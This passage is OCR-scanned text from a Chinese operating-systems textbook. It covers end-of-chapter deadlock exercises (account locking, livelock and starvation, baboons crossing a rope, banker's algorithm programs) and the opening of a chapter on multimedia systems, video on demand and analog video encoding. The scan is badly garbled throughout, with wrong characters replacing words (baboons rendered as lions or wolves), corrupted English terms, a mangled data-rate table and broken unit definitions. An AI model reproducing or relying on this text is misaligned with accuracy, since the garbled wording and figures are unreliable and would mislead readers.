作 : 每 一 进程 读 取 一 行 输入 ， 该 输入 给 出 一 定数 目的 球 项 、 贷 方 账户 、 
音 方 账户 。 然 后 该 进程 锁定 两 个 账户 ， 传 送 这 笔 钱 ， 完 成 后 释放 锁 。 由 
于 很 多 进程 并 行 运 行 ， 所 以 存在 这 样 的 危险 : 锁定 x 会 无 法 锁定 y， 因 为 
y 已 被 一 个 正在 等 竺 x 的 进程 锁定 。 设 计 一 个 方案 来 避免 死 锁 。 在 没有 完 
成 事务 处 理 前 不 要 释放 该 账户 记录 。〔 换 人 句 话 说 ， 在 锁定 一 个 账户 时 ， 
如 果 发 现 男 一 个 账户 不 能 被 锁定 残 立 即 释放 这 个 已 锁定 的 账户 。) 











27. 一 种 预防 死 锁 的 方法 是 去 除 占 有 和 等 竺 条件。 在 本 书 中 ， 假 设 
在 请 求 一 个 新 的 资源 以 前 ， 进 程 必须 释放 所 有 它 已 经 占有 的 资源 (假设 
这 是 可 能 的 ) 。 然 而 ， 这 样 做 会 引入 这 样 的 危险 性 : 使 竞争 的 进程 得 到 
了 新 的 资源 但 却 丢 失 了 原 有 的 资源 。 请 给 出 这 一 方法 的 改进 。 


28. 计 算 机 系 学 生 想 到 了 下 面 这 个 消除 死 锁 的 方法 。 当 某 一 进程 请 
求 一 个 资源 时 ， 规 定 一 个 时 间 限 。 如 果 进 程 由 于 得 不 到 需要 的 资源 而 阻 
塞 ， 定 时 喜 开 始 运行 。 当 超过 时 间 限 时 ， 进 程 会 被 释放 抒 ， 并 且 人 允许 该 
进程 重新 运行 。 如 果 你 是 教授 ， 你 会 给 这 样 的 学 生 多 少 分 ?为 什么 ? 





29. 解 释 死 锁 、 活 锁 和 饥饿 的 区 别 。 


30.Cinderella 和 Prince 要 离婚 ， 为 分 割 财 产 ， 他 们 商定 了 以 下 算法 。 
每 天 早晨 每 个 人 发 函 给 对 方 律师 要 求 财产 中 的 一 项 。 由 于 邮递 信件 需要 
一 天 的 时 间 ， 他 们 商定 如 果 发 现在 同一 天 两 人 请 求 了 同一 项 财产 ， 第 二 








天 他 们 会 发 信 取 消 这 一 要 求 。 他 们 的 财产 包括 狗 Woofer、Woofer 的 狗 
屋 、 金 丝竹 Tweeter 和 Tweeter 的 乌 笼 。 由 于 这 些 动物 喜爱 它们 的 房屋 ， 
所 以 又 商定 任何 将 动物 和 它们 房屋 分 开 的 方案 都 无 效 ， 且 整个 分 配 从 头 
开始 。Cinderella 和 Prince 都 非常 想 要 Woofer。 于 是 他 们 分 别 去 度假 ， 并 
且 每 人 都 编写 程序 用 一 台 个 人 计算 机 处 理 这 一 谈判 工作 。 当 他 们 度假 回 
来 时 ， 发 现 计 算 机 仍 在 谈判 ， 为 什么 ? 产生 死 锁 了 吗 ? 产生 饥饿 了 吗 ? 


请 讨论 。 





31. 一 个 主 修 人 类 学 、 辅 修 计算 机 科学 的 学 生 参 加 了 一 个 研究 诬 
题 ， 调 碍 是 否 可 以 教会 非洲 狮 狮 理 解 死 锁 。 他 找到 一 处 很 深 的 峡谷 ， 在 
上 边 回 定 了 一 根 横路 峡谷 的 绳索 ， 这 样 狮 狮 吏 可 以 擎 住 绳索 越过 峡谷 。 
同一 时 刻 ， 只 要 朝 着 相同 的 方 同 束 可 以 有 几 只 独 狼 通过 。 但 如 果 向 东 和 
回 西 的 狠 独 同时 攀 在 绳索 上 那么 会 产生 死 锁 〈 独 独 会 被 卡 在 中 间 〉， 因 
为 它们 无 法 在 绳索 上 从 另 一 只 的 背 上 翻 过 去 。 如 果 一 只 独 儿 想 越过 峡 
谷 ， 它 必须 看 当前 是 否 有 别 的 狮 狂 正在 逆 问 通行 。 利 用 信号 量 编写 一 个 
避免 死 锁 的 程序 来 解决 该 问题 。 不 考虑 连续 东 行 的 猩 独 会 使 得 西行 的 独 
狮 无 限制 地 等 待 的 情况 。 








32. 重 复 上 一 个 习题 ， 但 此 次 要 避免 饥饿 。 当 一 只 想 同 东 去 的 狮 狮 
来 到 绳索 跟前 ， 但 发 现 有 别 的 独 独 正在 问 西 越过 峡谷 时 ， 它 会 一 直 等 到 
强 索 可 用 为 止 。 但 在 至 少 有 一 只 狮 狮 癌 东 越 过 峡谷 之 前 ， 不 允许 再 有 狮 
独 开 始 从 东 回 西 越过 峡谷 。 


33. 编 写 银 行家 算法 的 模拟 程序 。 该 程序 应 该 能 够 循环 检查 每 一 个 
提出 请 求 的 银行 客户 ， 并 且 能 判断 这 一 请 求 是 含 安全。 请 把 有 关 请 求 和 
相应 决定 的 列表 输出 到 一 个 文件 中 。 








34. 写 一 个 程 厅 实 现 每 种 类 型 多 个 资源 的 死 锁 检 测 算法 。 你 的 程序 
应 该 从 一 个 文件 中 读 取 下 面 的 输入 : 进程 数 、 资 源 类 型 数 、 每 种 存在 类 
ALA SVR CREE) 、 当 前 分 配 和 矩阵 C《〈 第 一 行 ， 接 着 第 二 行 ， 以 此 
类 推 ) 、 需 求 和 矩阵 R《〈 第 一 行 ， 接 着 第 二 行 ， 以 此 类 推 ) 。 你 的 程序 输 
出 应 表明 在 此 系统 中 是 否 有 和 死 锁 。 如 果 系统 中 有 死 锁 ， 程 序 应 该 打印 出 
所 有 和 死 锁 的 进程 id 号 。 








35. 写 一 个 程序 使 用 资源 分 配 图 检测 系统 中 是 否 存 在 死 锁 。 你 的 程 
序 应 该 从 一 个 文件 中 读 取 下 面 的 输入 : 进程 数 和 资源 数 。 对 每 个 进程 ， 
你 应 该 读 取 4 个 数 ， 进程 当 前 持 有 的 资源 数 、 它 持 有 的 资源 的 ID、 它 当 
前 请 求 的 资源 数 、 它 请 求 的 资源 ID。 程 序 的 输出 应 表明 在 此 系统 中 是 否 
有 和 死 锁 。 如 果 系 统 中 有 死 锁 ， 程 序 应 该 打印 出 所 有 和 死 锁 的 进程 id 号 。 


第 7 草 多 媒体 操作 系统 





数字 电影 、 视 频 梳 辑 和 首 乐 正在 日 益 成 为 用 计算 机 表示 信息 

消遣 娱乐 的 常用 方式 。 音 频 和 视频 文件 可 以 保存 在 磁盘 上 ， 并 且 在 需要 
的 时 候 进行 回放 。 首 频 和 视频 文件 的 特征 与 传统 的 文本 文件 存在 很 大 的 
差 寞 ， 而 目前 的 文件 系统 却 是 为 文本 文件 设计 的 。 因 此 ， 需 要 设计 新 型 
的 文件 系统 来 处 理 音 频 和 视频 文件 。 不 仅 如 此 ， 保 存 与 回放 音频 和 视频 
同样 给 调度 程序 以 及 操作 系统 的 其 他 部 分 提出 了 新 的 要 求 。 本 章 中 ， 我 
们 将 研究 这 些 问 题 以 及 它们 与 设计 用 来 处 理 多 媒体 信息 的 操作 系统 之 间 
的 关系 。 





数字 电影 通常 归于 多 媒体 名 下 ， 多 媒体 的 字面 含义 是 一 种 以 上 的 巡 
体 。 在 这 样 的 定义 下 ， 本 书 就 是 一 部 多 媒体 作品 ， 毕 竟 它 包含 了 两 种 媒 
体 : 文本 和 图 像 〈 插 图 ) 。 然 而 ， 大 多 数 人 使 用 “多 媒体 ”这 一 术语 时 所 
指 的 是 包含 两 种 或 更 多 种 连续 媒体 的 文档 ， 连 续 媒 体 也 就 是 必须 能 够 在 
某 一 时 间 间 隔 内 回放 的 媒体 。 本 书 中 ， 我 们 将 在 这 样 的 意义 下 使 用 多 巡 
体 这 一 术语 。 


另 一 个 有 些 模糊 的 术语 是 “视频 ?。 在 技术 意义 上 ， 视 频 只 是 一 部 电 

影 的 图 像 部 分 (相对 的 是 声音 部 分 )。 实 际 上 ， 摄 像 机 和 电视 机 通常 有 
两 个 连接 器 ， 一 个 标 为 “视频 *， 一 个 标 为 “ 首 频 *"， 因 为 这 两 个 信号 是 

开 的 。 然 而 ，“ 数 字 视 频 ”* 这 一 术语 通 第 指 的 是 完整 的 作品 ， 既 包含 图 像 





也 包含 声 首 。 后 面 我 们 将 使 用 “电影 ”这 一 术语 指 完整 的 作品 。 注 意 ， 在 
这 种 意义 下 一 部 电影 不 一 定 是 好 汪 坞 以 超过 一 架 波 音 747 的 代价 制作 的 
长 达 两 小 时 的 大 片 ， 一 段 通过 因特网 从 CNN 主 页 下 载 的 30 秒 长 的 新 闻 勇 
辑 在 这 一 定义 下 也 是 一 部 电影 。 当 我 们 提 到 非常 短 的 电影 时 ， 也 将 其 称 


FY ARTES AE” 








7.1 多 媒体 简介 


在 讨论 多 媒体 技术 之 前 ， 了 解 其 目前 和 将 来 的 用 法 可 能 有 助 于 对 问 
题 的 理解 。 在 一 台 计 算 机 上 ， 多 媒体 通常 意味 着 从 数字 通用 光盘 
(Digital Versatile Disk, DVD) 播放 一 段 预先 录 好 的 电影 。DVD 是 一 种 
光盘 ， 它 使 用 与 CD-ROM 相 同 的 120 mm RGAE GER) 盘 片 ， 但 是 
记录 密度 更 高 ， 容 量 在 5GB 到 17GB 之 间 (取决 于 记录 格式 )。 





有 两 个 候选 者 正在 竞争 成 为 DVD 的 后 继 者 。 一 个 是 Blu-ray( 蓝 
光 ) 格式 ， 其 单 层 格式 容量 有 25GB 〈 双 层 格式 有 50GB ) 。 另 一 个 是 
HD DVD 格式 ， 其 单 层 格式 容量 有 15GB 〈 双 层 格 式 30GB) 。 每 一 种 格 
式 都 由 一 个 不 同 的 计算 机 和 电影 公司 的 财团 支持。 显然 ， 电 子 与 娱乐 产 
业 非 常 怀念 在 20 世 纪 70 年 代 到 80 年 代 Betamax 与 VHS 的 “格式 大 战 ”， 
此 他 们 决定 重 现 这 场 战争 。 考 庸 置疑 ， 当 消费 者 等 着 看 哪 家 最 终 胜 出 
时 ， 这 两 个 系统 的 普及 也 会 因为 这 次 “格式 大 战 ”而 推迟 好 几 年 。 











男 一 种 多 媒体 的 使 用 是 从 Internet 上 下 载 视频 短片 。 许 多 网 页 都 有 可 
以 点 击 下 载 短片 的 栏目 。 像 YouTube 一 样 的 Web 站 点 有 成 千 上 万 可 供 欣 
党 的 视频 短片 。 随 着 有 线 电 视 与 ADSL 〈 非 对 称 数 字 用 户 环线 ) 的 普 
及 ， 更 快 的 发 布 技术 会 占据 市 场 ，Pternet 中 的 视频 短片 将 会 像 火 箭 升天 
一 样 狐 增 。 








为 一 个 必须 支持 多 巡 体 的 领域 是 视频 本 里 的 制作 。 目 前 有 许多 多 媒 
体 编辑 系统 ， 这 些 系统 需要 在 不 仪 文 持 传 统 作业 而 且 还 支持 多 媒体 的 操 
作 系 统 上 运行 ， 以 获得 最 好 的 性 能 。 


多 媒体 还 在 另 一 个 领域 中 发 挥 着 越 来 越 重 要 的 作用 ， 这 就 是 计算 机 
游戏 。 计 算 机 游戏 经 和 常 要 运行 短暂 的 视频 藤 辑 来 描述 条 种 活动 。 这 些 视 
频 可 辑 通常 很 短 ， 但 是 数量 非 闸 多 ， 并 且 还 要 根据 用 户 采 取 的 茶 些 行动 
动态 地 选择 正确 的 视频 剪辑 。 计 算 机 游戏 正 变 得 越 来 越 复 林 。 当 然 ， 游 
戏 本 身 也 会 生成 大 量 的 动画 ， 不 过 ， 处 理 程 序 生成 的 视频 与 播放 一 段 电 
影 是 不 相同 的 。 




















最 后 ， 多 媒体 世界 的 圣杯 是 视频 点 播 (video on demand) ， 这 意味 
着 消费 者 能 够 在 家 中 使 用 电视 遥控 器 〈 或 鼠标 ) 选择 电影 ， 并 且 立 刻 将 
其 在 电视 机 《或 计算 机 显示 器 ) 上 显示 出 来 。 视 频 点 播 要 求 有 特殊 的 基 
础 设施 才能 使 用 。 图 7-1 所 示 为 两 种 可 能 的 视频 点 播 基础 设施 ， 每 种 都 
包含 三 个 基本 的 组 件 : 一 个 或 多 个 视频 服务 器 、 一 个 分 布 式 网 络 以 及 一 
个 在 每 个 房间 中 用 来 对 信号 进行 解码 的 机 顶 盒 。 视 频 服务 器 (video 
server) 古 一 合 功能 强大 的 计算 机 ， 在 其 文件 系统 中 存放 着 许多 电影 ， 
并 且 可 以 按照 点 播 请 求 回 放 这 些 电影 。 大 型 机 有 时 用 来 作为 视频 服务 
器 ， 因 为 大 型 机 连接 1000 个 大 容量 的 磁盘 是 一 件 轻而易举 的 事情 ;而 在 
个 人 计算 机 上 连接 1000 个 容量 不 太 大 的 磁盘 也 是 一 件 很 困难 的 事情 。 在 
本 章 后 续 各 节 中 ， 有 许多 材料 是 关于 视频 服务 融 及 其 操作 系统 的 。 

















视频 服务 器 


同 轴 电 统 
b) 


图 7-1 视频 点 播 使 用 不 同 的 本 地 分 布 技术 : ADSL; b) 有 线 电 视 


用 户 和 视频 服务 器 之 间 的 分 布 式 网 络 必须 能 够 高 速 实时 地 传输 数 
据 。 这 种 网 络 的 设计 十 分 有 趣 也 十 分 复杂 ， 但 是 这 超出 了 本 书 的 范围 。 
我 们 不 想 更 多 地 讨论 分 布 式 网 络 ， 只 想 说 明 分 布 式 网 络 总 是 使 用 光纤 从 
视频 服务 器 连接 到 客户 居住 的 居民 点 的 汇 接 盒 。ADSL 系 统 是 由 电话 公 
司 经 营 的 ， 在 ADSL 系 统 中 ， 现 有 的 双 绞 电话 线 提供 了 最 后 一 公里 的 数 
据 传 输 。 有 线 电视 是 由 有 线 电视 公司 经 营 的 ， 在 有 线 电视 系统 中 ， 现 有 





的 有 线 电视 电缆 用 于 信和 号 的 本 地 分 送 。ADSL 的 优点 是 为 每 个 用 户 提供 
了 专用 数据 通 直 ， 因 此 带宽 有 保证 ， 但 是 由 于 现 有 电话 线 的 局 限 其 市 宽 
比较 低 《只 有 几 Mb/s) 。 有 线 电视 使 用 高 带宽 的 同 轴 电 缆 ， 带 宽 可 以 达 
到 几 Gb/s， 但 是 许多 用 户 必 须 共 孚 相同 的 电线 ， 从 而 导致 竞争 ， 对 于 每 
个 用 户 来 说 带宽 没有 保证 。 不 过 ， 为 了 与 有 线 电 视 竞 争 ， 电 话 公司 正在 
为 住户 铺设 光缆 ， 这 样 ， 光 绕 上 的 ADSL 将 比 电视 电缆 有 更 大 的 带宽 。 








系统 的 最 后 一 部 分 是 机 顶 盒 (set-top box) ， 这 是 ADSL 或 电视 电线 
终结 的 地 方 。 机 顶 盒 实际 上 就 是 普通 的 计算 机 ， 只 不 过 其 中 包含 特殊 的 
心 片 用 于 视频 解码 和 解压 缩 。 机 顶 盒 最 少 要 包含 CPU、RAM、ROM、 
与 ADSL 或 电视 电费 的 接口 ， 以 及 用 于 跟 电视 机 连接 的 端子 。 





机 项 盒 的 谷 代 品 是 使 用 客户 现 有 的 PC 机 并 且 在 显示 器 上 显示 电 
影 。 十 分 有 趣 的 是 ， 大 多 数 客 尸 可 能 都 已 经 拥有 一 台 计 算 机 ， 为 什么 还 
要 考虑 机 顶 盒 呢 ， 这 是 因为 视频 点 播 的 运营 商 认为 人 们 更 愿意 在 起 居室 
中 看 电影 ， 而 起 居室 中 通常 放 有 电视 机 ， 很 少 有 计算 机 。 从 技术 角度 
看 ， 使 用 个 人 计算 机 代 蔡 机 项 盒 更 有 道理 ， 因 为 计算 机 的 功能 更 加 强 
大 ， 拥 有 大 容量 的 磁盘 ， 并 且 拥 有 更 高 分 辨 率 的 显示 露 。 不 管 采 用 的 是 
机 顶 合 还 是 个 人 计算 机 ， 在 解码 并 显示 电影 的 用 户 端 ， 我 们 通常 都 要 区 
分 视频 服务 器 和 客户 机 进程 。 然 而 ， 以 系统 设计 的 观点 ， 客 户 机 进程 是 
在 机 顶 盒 上 运行 还 是 在 PC 机 上 运行 并 没有 太 大 的 关系 。 对 于 果 面 视频 
编辑 系统 而 言 ， 所 有 的 进程 都 运行 在 相同 的 计算 机 上 ， 但 古 我 们 将 继续 
































使 用 服务 器 和 客户 这 样 的 术语 ， 以 便 搞 消 楚 哪个 进程 正在 做 什么 事情 。 


回 到 多 媒体 本 身 ， 要 想 成 功 地 处 理 多 媒体 则 必须 很 好 地 理解 它 所 具 
有 的 两 个 关键 特征 : 


J) 多 媒体 使 用 极 高 的 数据 率 。 





2) 多 媒体 有 要 求实 时 回放 。 








高 数据 率 来 自视 觉 与 听觉 信息 的 本 性 。 眼 睛 和 耳 休 每 秒 可 以 处 理 巨 
大 数量 的 信息 ， 必 须 以 这 样 的 速率 为 眼睛 和 耳 条 提供 信息 才能 产生 可 以 
接受 的 观察 体验 。 图 7-2 列 举 了 几 种 数字 多 媒体 源 和 某 些 常见 硬件 设备 
的 数据 率 。 在 本 章 后 面 我 们 将 讨论 这 些 编码 格式 。 需 要 注意 的 是 ， 多 媒 
体 需 要 的 数据 率 越 高 ， 则 越 需要 进行 压缩 ， 并 且 需 要 的 存储 量 也 就 越 
大 。 例 如 ， 一 部 未 压缩 的 2 小 时 长 的 HDTV 电影 将 填 满 一 个 570GB 的 文 
件 。 存 放 1000 部 这 种 电影 的 视频 服务 器 需要 570TB 的 磁盘 空间 ， 按 照 目 
前 的 标准 这 可 是 难以 想象 的 数量 。 还 需要 注意 的 是 ， 没 有 数据 压缩 ， 目 
前 的 硬件 不 可 能 跟 上 这 样 的 数据 率 。 我 们 将 在 本 章 后 面 讨 论 视 频 压 缩 。 
















































































| 数据 源 | Mbps | GB/hr a Mbps 
电话 (PCM) 0.064 0.03 | | 快速 以 太 网 100 
MP3 音 乐 0.14 0.06 | |EIDE 磁 盘 | 133| 
音频 CD UET 0.62 | | ATM OC-3 4% 156 
MPEG-2 电 影 (640x480) | 4 1.76 | |IEEE 1394b( FireWire)! 800 
数字 便携 式 摄像 机 (720X480) | 25 11 | | 千 光 位 以 太 网 ”| 1000| 
未 压缩 电视 (640 X 480) 221 97 | |SATA 磁 盘 3000 
未 压缩 HDTV (1280X720) | 648 | 288 | |SCSIUltra-640 磁 盘 | 5120 





图 7-2 某 些 多 媒体 和 高 性 能 LI/O 设 备 的 数据 率 (1 Mbps=10 位 / 秒 ， 


1 GB=2? 25 ) 


多 媒体 对 系统 提出 的 第 二 个 要 求 是 需要 实时 数据 传输 。 数 字 电 影 的 
视频 部 分 每 秒 包含 某 一 数目 的 帧 。 北 美 、 南 美和 日 本 采用 的 NTSC 制 式 
每 秒 包 含 30 帧 〈 对 纯粹 主义 者 而 言 是 29.97 帧 ) ， 世 界 上 其 他 大 部 分 地 
区 采用 的 PAL 和 SECAM 制 式 每 秒 包 含 25 帧 〈 对 纯粹 主义 者 而 言 是 25.00 
Wi) 。 帧 必须 分 别 以 33.3ms 或 40ms 的 精确 时 间 间 隔 传 输 ， 否 则 电影 看 起 
来 将 会 有 起 伏 。 








NTSC 代 表 美 国 国家 电视 标准 委员 会 National Television Standards 
Committee) ， 但 是 当 彩 色 电 视 发 明 时 将 彩色 引入 该 标准 的 拙劣 方法 产 
生 了 业界 的 一 个 笑话 ， 戏 称 NTSC 代 表决 不 复 现 相同 的 颜色 (Never 
Twice the Same Color) 。PAL 人 代表 相 位 交错 排列 (Phase Alternating 
Line) ， 它 是 技术 上 最 好 的 制式 。SECAM 代 表 顺 序 与 存储 彩色 

(SEquentiel Couleur Avec Memoire) ， 该 制式 被 法 国 采 用 ， 意 在 保护 法 
的 电视 制造 商 免 受 国外 竞争 。SECAM 还 被 东欧 国家 所 采用 。 











耳 打 比 眼 睛 更 加 敏感 ， 传 输 时 间 中 即使 存在 几 毫 秒 的 变动 也 会 被 察 
觉 到 。 传 输 率 的 变动 称 为 颤动 (jitter) ， 必 须 严 格 限制 颤动 以 获得 良好 
的 性 能 。 注 意 ， 颤 动 不 同 于 延迟 。 如 果 图 7-1 中 的 分 布 式 网 络 均匀 地 将 
所 有 的 位 准确 地 延迟 5s， 电 影 将 开始 得 稍稍 晚 一 些 ， 但 是 看 起 来 却 不 
错 。 但 从 另 一 方面 来 说 ， 如 有 果 分 布 式 网 络 在 100 一 200ms 之 间 随 机 地 延迟 
各 帧 ， 那 么 不 论 是 谁 主演 的 电影 ， 看 起 来 都 像 是 碍 理 ' 晶 别 林 的 老 片 。 


让 人 可 以 接受 地 回放 多 媒体 所 要 求 的 实时 性 通常 通过 服务 质量 
(quality of service) 参数 来 描述 ， 这 些 参数 包括 可 用 平均 带宽 、 可 用 峰 
值 带宽 、 最 小 和 最 大 延迟 《〈 两 者 一 起 限制 了 颤动 ) 以 及 位 丢失 概率 。 例 
如 ， 网 络 运 营 商 提供 的 服务 可 以 保证 4 Mbps 的 平均 带宽 、105 一 110ms 时 
间 间 隔 之 内 99% 的 传输 延迟 以 及 10-10 的 位 丢失 概率 ， 那 么 这 样 的 服务 质 
量 对 于 MPEG-2 电 影 来 说 是 非常 好 的 。 网 络 运营 商 还 可 以 提供 价格 更 为 
低廉 等 级 也 比较 低 的 服务 ， 例 如 平均 带宽 为 1 Mbps〈 如 ADSL) ， 在 这 
种 情况 下 ， 服 务 质量 就 不 得 不 打 些 折扣 ， 可 能 是 降低 分 辨 率 、 降 低 帧 率 
或 者 是 放弃 颜色 信息 以 黑白 方式 播放 电影 。 

















提供 服务 质量 保证 的 最 常见 的 方法 是 预先 为 每 一 个 新 到 的 客户 预 留 
容量 ， 预 留 的 资源 包括 CPU、 内 存 缓冲 区 、 磁 盘 传 输 容 量 以 及 网 络 带 
宽 。 如 果 一 位 新 的 客户 到 来 并 且 想 观看 一 部 电影 ， 但 是 视频 服务 器 或 网 
络 计算 出 不 具有 为 另 一 位 客户 提供 服务 的 容量 ， 那 么 它 将 拒绝 新 的 客 
户 ， 以 避免 降低 同 当 前 客户 提供 的 服务 质量 。 因 此 ， 多 媒体 服务 器 需要 





有 资源 预 留 方案 和 进入 控制 算法 (admission control algorithm) ， 以 判 
定 什么 时 候 能 够 处 理 更 多 的 任务 。 


7.2 ”多 媒体 文件 


在 大 多 数 系统 中 ， 普 通 的 文本 文件 由 字 节 的 线性 序列 组 成 ， 没 有 操 
作 系 统 了 解 或 关心 的 任何 结构 。 对 于 多 媒体 而 言 ， 情 况 就 复杂 多 了 。 首 
先 ， 视 频 与 音频 是 完全 不 同 的 。 它 们 由 不 同 的 设备 捕获 〈 视 频 为 CCD 世 
片 ， 音 频 为 麦克 风 ) ， 有 具有 不 同 的 内 部 结构 〈 视 频 每 秒 有 25 一 30 帧 ， 音 
频 每 秒 有 44 100 个 样本 ) ， 并 且 它 们 通过 不 同 的 设备 来 回放 (视频 为 显 
音频 为 扩 音 器 ) 





>| 
Bu 





此 外 ， 大 多 数 好 莱 坞 电影 现在 针对 的 是 全 世界 的 观众 ， 而 这 些 观众 
大 多 不 讲 英 语 。 这 一 情况 有 两 种 处 理 方法 。 对 于 某 些 国家 ， 需 要 产生 一 
个 额外 的 声音 轨迹 ， 用 当地 语言 进行 配音 ， 但 是 不 包含 音效 。 在 日 本 ， 
所 有 的 电视 都 具有 两 个 声 道 ， 电 视 观 众 看 外 国 影片 时 可 以 听 原 声 语 言 也 
可 以 听 上 日语， 遥控 器 上 有 一 个 按钮 可 以 用 来 进行 语言 选择 。 在 其 他 国家 
中 ， 使 用 的 是 原始 的 声音 轨迹 ， 配 以 当地 语言 的 字幕 。 














除 此 之 外 ， 许 多 在 电视 中 播放 的 电影 现在 也 提供 英文 字幕 ， 使 讲 英 
语 但 是 听力 较 弱 的 人 可 以 观看 。 结 果 ， 数 字 电 影 实际 上 可 能 由 多 个 文件 
组 成 : 一 个 视频 文件 、 多 个 音频 文件 以 及 多 个 包含 各 种 语言 字幕 的 文本 
文件 。DVD 能 够 存放 至 多 32 种 语言 的 字幕 文件 。 人 简单 的 一 组 多 媒体 文件 
如 图 7-3 所 示 ， 我 们 将 在 本 章 后 面 解 释 快 进 和 快 倒 的 含义 。 
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德语 音频 











英语 字幕 
荷兰 语 字幕 


Hello, Bob o, Alic Sur How Gre Good 

| Dag, Bob | | Goes | 
tit TMM 
tet 下 站 


图 7-3 电影 可 能 由 若干 文件 组 成 





因此 ， 文 件 系 统 需 要 跟踪 每 个 文件 的 多 个 “ 子 文件 ”。 一 种 可 能 的 方 
案 是 像 传统 的 文件 一 样 管理 每 个 子 文件 〈 例 如 ， 使 用 i 节 点 来 跟踪 文件 
的 块 ) ， 并 且 要 有 一 个 新 的 数据 结构 列 出 每 个 多 媒体 文件 的 全 部 子 文 
件 。 为 一 方法 是 创造 一 种 二 维 的 节点， 使 每 一 列 列 出 每 个 子 文件 的 全 
部 块 。 一 般 而 言 ， 其 组 织 必须 能 够 使 观众 观看 电影 时 可 以 动态 地 选择 使 
用 哪个 音频 及 字幕 轨迹 。 








在 各 种 情况 下 ， 还 必须 有 保持 子 文件 同步 的 茶 种 方法 ， 这 样 才能 保 
证 当选 中 的 音频 轨迹 回放 时 与 视频 保持 同步 。 如 果 音 频 与 视频 存在 即使 
是 轻微 的 不 同步 ， 观 众 可 能 会 在 演员 的 嘴唇 运动 之 前 或 之 后 才 听 到 他 说 





的 话 ， 这 很 容易 察觉 到 ， 相 当 让 人 扫兴 


为 了 更 好 地 理解 多 媒体 文件 是 如 何 组 织 的 ， 有 必要 在 某 种 细节 程度 
上 了 解数 字音 频 与 数字 视频 是 如 何 工作 的 ， 下 面 我 们 将 介绍 这 些 主题 。 


7.2.1 ”视频 编码 


人 类 的 眼睛 具有 这 样 的 特性 当 一 幅 图 像 内 现在 视网膜 上 时 ， 在 它 
爱 退 之 前 将 保持 几 台 秒 的 时 间 。 如 果 一 个 图 像 序 列 以 每 秒 50 或 更 多 张 图 
像 内 现 ， 眼 睛 就 不 会 注意 到 它 看 到 的 是 不 连续 的 图 像 。 所 有 基于 视频 或 
影片 胶片 的 运动 图 像 系统 都 利用 了 这 一 原理 产生 活动 的 画面 。 


要 想 理解 视频 系统 ， 最 好 从 简单 且 过 时 的 黑白 电视 开始 。 为 了 将 二 
维 图 像 表示 为 作为 时 间 函 数 的 一 维 电 压 ， 摄 像 机 用 一 个 电子 束 对 图 像 进 
行 横向 扫描 并 缓慢 地 向 下 移动 ， 记 录 下 电子 束 经 过 处 光 的 强度 。 在 扫描 
的 终点 处 ， 电 子 束 折 回 ， 称 为 一 帧 Crame) 。 这 一 作为 时 间 函 数 的 光 
的 强度 以 广播 方式 传播 出 去 ， 接 收 机 则 重复 扫描 过 程 以 重 构图 像 。 摄 像 
机 与 接收 机 采用 的 扫描 模式 如 图 7-4 所 示 。 (CCD 摄 像 机 的 成 像 方 式 是 
积分 而 非 扫 描 ， 但 是 某 些 摄像 机 及 所 有 的 CRT 显 示 器 采用 的 都 是 扫描 方 
二 








一 场 的 屏幕 上 画 出 的 
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图 7-4 _ NTSC 视频 和 电视 使 用 的 扫描 模式 


精确 的 扫描 参数 随 国家 的 不 同 而 有 所 不 同 。NTSC 有 525 条 扫描 线 ， 
水 平 与 垂直 方向 的 纵横 比 为 43， 每 秒 为 90《〈 实 际 为 29.97) 帧 。 欧 洲 的 
PAL 和 SECAM 制 式 有 625 条 扫描 线 ， 纵 横 比 也 是 4:3， 每 秒 为 25 帧 。 在 两 
种 制式 中 ， 顶 端 和 底 端的 几 条 线 是 不 显示 的 《为 的 是 在 原始 的 圆 形 CRT 
上 显示 一 个 近似 矩形 的 图 像 〉。525 条 NTSC 扫 描 线 中 只 显示 483 条 ，625 


条 PAL/SECAM 扫 擂 线 中 只 显示 576 条 。 




















虽然 每 秒 25 帧 足以 捕获 平 请 的 运动 ， 但 是 在 这 样 的 帧 率 下 ， 有 许多 
人 特别 是 老年 人 会 感觉 到 图 像 内 烁 “因为 新 的 图 像 尚 未 出 现 以 前 旧 的 图 
像 就 已 经 在 视网膜 上 消失 〉 。 增 加 帧 率 就 会 对 稀缺 的 带宽 提出 更 多 的 要 





求 ， 因 此 要 采取 不 同 的 方法 。 这 一 方法 不 是 按 从 上 到 下 的 顺序 显示 扫描 
线 ， 而 是 首先 显示 所 有 的 奇数 扫描 线 ， 接 独 再 显示 所 有 的 偶数 扫描 线 。 
此 处 的 半 帧 称 为 一 个 场 Cied) 。 实 验 表明 ， 尽 管 人 们 在 每 秒 25 帧 时 感 
党 到 闪烁 ， 但 是 在 每 秒 50 场 时 却 感 觉 不 到 。 这 一 技术 被 称 为 隔行 扫描 
Cinterlacing) 。 非 隔行 扫描 的 电视 或 视频 被 称 为 逐 行 扫描 


(progressive) 。 








彩色 视频 采用 与 单 色 ( 黑 日 ) 视频 相同 的 扫描 模式 ， 只 不 过 使 用 了 
三 个 同时 运动 的 电子 束 而 不 是 一 个 运动 电子 束 来 显示 图 像 ， 对 于 红 、 绿 
Mi (RGB) 这 三 个 加 性 原色 中 的 每 一 颜色 使 用 一 个 电子 束 。 这 一 技术 
能 够 工作 是 因为 任何 颜色 都 可 以 由 红 、 绿 和 赣 以 适当 的 强度 线性 登 加 而 
构造 出 来 。 然 而 ， 为 了 在 一 个 信道 上 进行 传输 ， 三 个 彩色 信号 必须 组 合 


成 一 个 复合 (composite) 信号。 





为 了 使 黑白 接收 机 可 以 显示 传输 的 彩色 电视 节目 ，NTSC、PAL 和 
SECAM 三 种 制式 均 将 RGB 信 号 线性 组 合 为 一 个 亮度 (luminance) 信和 号 
和 两 个 色 度 Cchrominance) 信号 ， 但 是 不 同 的 制式 使 用 不 同 的 系数 从 
RGB 信 号 构造 这 些 信号 。 说 来 也 奇怪 ， 人 的 眼睛 对 亮度 信号 比 对 色 度 信 
号 敏感 得 多 ， 故 色 度 信号 倒 不 必 非 要 精确 地 进行 传输 。 因 此 ， 亮 度 信和 号 
应 该 用 与 昌 的 黑白 信号 相同 的 频率 进行 广播 ， 从 而 使 其 可 以 被 黑白 电视 
机 接收 。 两 个 色 度 信 号 则 可 以 以 更 高 的 频率 用 较 鹤 的 波段 进行 广播 。 某 
些 电视 机 有 标 着 亮度 、 色 调和 饱和 度 〈 或 者 是 亮度 、 色 彩 和 颜色 ) 字样 











的 旋钮 或 调节 装置 ， 可 以 分 别 控制 这 三 个 信号 。 理 解 亮 度 和 色 度 对 于 理 
解 视 频 压缩 的 工作 原理 是 十 分 必要 的 。 


到 目前 为 止 我 们 介绍 的 都 是 模拟 视频 ， 现 在 让 我 们 转 问 数字 视频 。 
